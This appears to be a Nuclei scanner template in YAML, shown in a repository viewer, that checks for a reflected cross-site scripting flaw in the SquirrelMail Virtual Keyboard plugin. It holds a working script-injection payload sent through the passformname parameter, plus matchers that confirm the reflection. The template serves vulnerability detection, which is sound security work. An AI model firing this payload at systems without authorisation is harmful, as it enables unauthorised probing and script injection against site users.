nuclei-templates/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss....

41 lines
1.3 KiB
YAML
Raw Normal View History

2021-11-15 18:28:18 +00:00
id: squirrelmail-vkeyboard-xss
info:
name: SquirrelMail Virtual Keyboard <=0.9.1 - Cross-Site Scripting
2021-11-15 18:28:18 +00:00
author: dhiyaneshDk
severity: medium
description: SquirrelMail Virtual Keyboard plugin 0.9.1 and prior contains a cross-site scripting vulnerability via the vkeyboard.php parameter. It fails to properly sanitize user-supplied input, which allows an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.exploit-db.com/exploits/34814
classification:
2023-03-03 15:27:54 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
tags: xss,squirrelmail,plugin,edb
metadata:
max-request: 1
2021-11-15 18:28:18 +00:00
variables:
payload: "\"><script>alert({{rand_int()}});</script><script>/*"
http:
2021-11-15 18:28:18 +00:00
- method: GET
path:
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname={{url_encode(payload)}}'
2021-11-16 09:43:47 +00:00
2021-11-15 18:28:18 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'onclick="window.opener.document.forms[0].{{payload}}'
2021-11-15 18:28:18 +00:00
part: body
- type: word
words:
- "text/html"
part: header